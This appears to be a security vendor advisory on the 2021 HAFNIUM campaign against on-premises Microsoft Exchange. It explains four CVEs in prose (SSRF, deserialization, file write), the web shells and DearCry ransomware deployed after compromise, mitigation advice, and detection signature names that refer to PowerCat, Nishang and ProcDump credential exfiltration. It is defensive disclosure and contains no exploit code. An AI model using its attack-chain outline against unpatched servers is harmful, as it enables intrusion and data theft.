Update [19-Mar-2021]
Microsoft has released to GitHub the new Microsoft Exchange On-Premises Mitigation Tool and posted a blog with step-by-step instructions on how to use the tool. This is a free, one-click tool designed to help customers who have not yet applied the on-premises Exchange security update to temporarily protect their servers prior to patching. Microsoft has also issued a guidance for responders investigating and remediating these Exchange Server vulnerabilities.
There were also reports of threat actors installing a new ransomware called 'Dearcry' after hacking into Microsoft Exchange servers using the disclosed vulnerabilities.
Zscaler Coverage
Zscaler has added coverage for the Dearcry ransomware family and the web shells which were found deployed on these compromised servers using Advanced Threat Signatures and Advanced Cloud Sandbox.
- Advanced Threat Protection
Win32.Ransom.DearCry
HTML.Webshell.Hafnium
Win32.Backdoor.Hafnium - Advanced Cloud Sandbox
Win32.Ransom.DearCry
[End of Update]
Background
Microsoft has reported multiple exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) has attributed this campaign to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.
What is the issue?
The following vulnerabilities were being exploited:
CVE-2021-26855: Server-side request forgery (SSRF) vulnerability in Exchange which allows the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.
CVE-2021-26857: Insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is de-serialized by a program. Exploiting this vulnerability gave attacker the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.
CVE-2021-26858: Post-authentication arbitrary file write vulnerability in Exchange. If the attacker could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.
CVE-2021-27065: Post-authentication arbitrary file write vulnerability in Exchange. If the attacker could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.
After exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise.
What products are impacted?
- Microsoft Exchange Server 2019
- Microsoft Exchange Server 2016
- Microsoft Exchange Server 2013
How can you identify if you have been compromised?
Detection guidance and Advanced hunting queries to help customers investigate this activity has been published by Microsoft here.
What can you do to protect yourself?
- Ensure that your users always have the Zscaler Client Connector running to ensure coverage against these exploits.
- We highly recommend ensuring you have the latest security updates installed for the products affected by these CVEs.
- Keep your security software up to date with the latest definitions.
- Reduce the attack surface by limiting the visibility of these servers to the internet.
Zscaler coverage
The following signature detections are now in production for Zscaler customers:
- Advanced Threat Protection
HTML.Exploit.CVE-2021-26855
Win32.Exploit.Nishang
PS.Hacked.PowerCat
- Advanced Cloud Sandbox
Win32.Exploit.CVE-2021-26855
- Advanced Cloud Firewall
HTML.Exploit.CVE-2021-26855
Win32.Trojan.ProcdumpExfil
Win64.Trojan.ProcdumpExfil
Details related to these threat signatures can be found in the Zscaler Threat Library.
The Zscaler Cloud Sandbox will provide proactive coverage against weaponised payloads trying to exploit these vulnerabilities. The Zscaler ThreatLabZ team is also actively monitoring
and ensuring coverage for all the latest IOCs associated with these vulnerabilities targeting the Microsoft Exchange servers.
References
1. https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
2. https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901
3. https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/